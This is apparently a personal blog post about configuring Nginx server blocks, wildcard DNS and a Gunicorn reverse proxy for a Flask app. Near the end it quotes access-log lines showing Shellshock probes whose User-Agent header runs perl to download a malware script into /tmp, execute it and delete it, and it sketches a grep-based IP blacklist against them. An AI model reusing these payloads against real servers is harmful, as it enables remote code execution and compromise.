An accounting of my attempts to set up Nginx, Flask, and the mess that I call my corner of the internet.
It seems a theme for this whole blog might be: repackaging information you could find somewhere else. In keeping with that theme, I'll be writing up how I set up Nginx and this site in general, all in an effort to document some of the sticking points I hit and commit them to memory.
There are a variety of resources available online on how to configure Nginx. The official documentation is okay, but like most project documentation it was a bit over my head when I was just getting started. Plenty of people have gone to the trouble of documenting how they set up Nginx or Flask, or any number of other frameworks and configurations; the trouble I found was that none was exactly what I wanted, or it had fallen out of date with the most recent changes to the different parts of the web stack. So what's one more voice chiming in with an unasked-for opinion? To the best of my knowledge these notes are accurate as of the post date.
Though I didn't think to check at the time, it's probably best to ensure Nginx is up to date before anything else. A downside to running Debian stable on the server is that some packages lag behind more recent releases, which isn't necessarily an issue, but in the case of a web server like Nginx the packaged version was missing several security fixes. So I pulled it in from an available backport:
Adding the line:

deb http://security.debian.org/ wheezy/updates main

to /etc/apt/sources.list and then installing with:

apt-get -t wheezy-backports install nginx

where the -t flag specifies a target release. In my case this brought the system up to 1.6.2, which addressed CVE-2014-3616.
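As a quick sanity check (not something I thought to do at the time), the installed version can be confirmed with:

$ nginx -v
nginx version: nginx/1.6.2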
Nginx is pretty liberal in the configurations it will happily accept, which meant I initially had a rather poorly thought-out nginx.conf file peppered with all manner of server blocks and directives. I quickly ran into the headaches of managing the configuration for several subdomains from a single file, though, and found my way to the sites-available and sites-enabled directory structure advised by the Nginx documentation.
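The Debian packaging wires this up in the stock nginx.conf, which pulls in everything under sites-enabled from its http block; a quick grep shows the relevant line (output reproduced from memory of the stock file, so treat it as approximate):

$ grep sites-enabled /etc/nginx/nginx.conf
        include /etc/nginx/sites-enabled/*;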
As an example of my current configuration, I've set up the subdomain for this blog in a file, idle.nprescott.com, in the sites-available directory as follows:
server {
    listen 80;
    root /home/nolan/idle;
    index index.html index.htm index.nginx-debian.html;
    server_name idle.nprescott.com www.idle.nprescott.com;

    location / {
        try_files $uri $uri/ =404;
    }
}
This means I can sync the entire output directory generated by Frog into a single directory on my server [1]. The file in sites-available is symlinked into the sites-enabled directory with the following:
ln -s ../sites-available/idle.nprescott.com ../sites-enabled/idle.nprescott.com
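None of that takes effect until the configuration is checked and reloaded; on my setup that amounts to something like:

$ nginx -t              # check the configuration for syntax errors
$ service nginx reload  # reload without dropping connections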
With the server properly configured, it is important to set up the DNS records for the new subdomain (which I touched on in this post). The major takeaway in my case was to ensure I had set:

CNAME * nprescott.com

which effectively defers the various subdomain routing to Nginx's server block configurations, as seen above.
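A quick sanity check from the outside is dig, which should show the wildcard CNAME resolving through to the server's address:

$ dig +short idle.nprescott.com
nprescott.com.
107.170.216.189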
Also on the subject of DNS setup, one thing that was very much set-and-forget was the A record for my entire site. The A record is the address record responsible for routing traffic from my domain name to the server's IP address. Just for kicks you can also browse my home page at http://107.170.216.189/.
I haven't yet given much thought to the breakdown between subdomains and regular addressing on my site - I'm told subdomains can (temporarily) confuse SEO efforts (or hurt existing rankings). I can safely say that's not something I'm worried about at this time.
Slightly more difficult than serving static resources through Nginx was configuring the web server to reverse proxy an application server such as Gunicorn. To reverse proxy Gunicorn for glue-boy, a Flask application, I have the following configuration file in sites-available:
server {
    listen 80;
    server_name glue.nprescott.com www.glue.nprescott.com;
    root /home/nolan/glue-boy;

    access_log /home/nolan/glue-boy/logs/access.log;
    error_log /home/nolan/glue-boy/logs/error.log;

    location / {
        proxy_pass http://127.0.0.1:8000;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header Host $http_host;
    }
}
I use this in conjunction with Gunicorn, kicked off with:

gunicorn -w 4 --bind=localhost:8000 glue-boy:app \
    --log-file /home/nolan/glue-boy/logs/gunicorn.log --daemon
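A quick smoke test is to hit Gunicorn directly from the server and then again through Nginx, to confirm the reverse proxy really is what sits in the middle:

$ curl -I http://127.0.0.1:8000/       # straight to Gunicorn, bypassing Nginx
$ curl -I http://glue.nprescott.com/   # through the Nginx reverse proxy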
While this blog is entirely static content, the web applications I've spoken about above do present a larger attack surface for the various bad actors of the internet. A cursory glance through the server logs gives some idea of the sheer number of jerks trying to ruin my day [2]:
$ sed -n '/perl/p' access.log | curl -F "content=<-" http://glue.nprescott.com
91.202.104.5 - - [17/Feb/2015:11:12:18 +0000] "GET / HTTP/1.1" 200 1504 "-" "()\
{ :;};/usr/bin/perl -e 'print \x22Content-Type:\
text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget\
[webaddress for some-jerkoffs-malware.txt] -O /tmp/b.pl;curl -O /tmp/b.pl\
[webaddress for some-jerkoffs-malware.txt];perl /tmp/b.pl;rm -rf\
/tmp/b.pl*\x22);'"
...
...
107.170.243.205 - - [18/Feb/2015:02:18:48 +0000] "GET /cgi-bin/sat-ir-web.pl\
HTTP/1.1" 404 134 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type:\
text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget\
[webaddress for some-jerkoffs-malware.txt] -O /tmp/b.pl;curl -O /tmp/b.pl\
[webaddress for some-jerkoffs-malware.txt];perl /tmp/b.pl;rm -rf\
/tmp/b.pl*\x22);'"
...
...
On and on, sometimes hundreds of requests in the span of minutes. I've given some thought to building a system to periodically log these requests and the IPs from which they originate in order to blacklist them, along the lines of a bot blackhole. There's also the opportunity to draw some kind of metrics from the logs. I don't much care about the "metrics" derived from things like Google Analytics (which I don't bother with), but it could be passingly interesting (or depressing) to visualize the ratio of (seemingly) human requests to bot requests.
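As a rough sketch of how that blacklisting might work (nothing like this is actually in place; the file name and the assumption that the probes always mention /usr/bin/perl are just for illustration), the offending IPs could be pulled from the log into a pile of Nginx deny directives:

$ grep -F '/usr/bin/perl' access.log | awk '{print "deny " $1 ";"}' | sort -u \
    > /etc/nginx/conf.d/blacklist.conf
$ service nginx reload

Run periodically from cron, that would at least turn the most obvious Shellshock probes away with a 403.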
[1] I scp the whole output directory to the server; I think rsync might be smarter in terms of skipping unchanged files.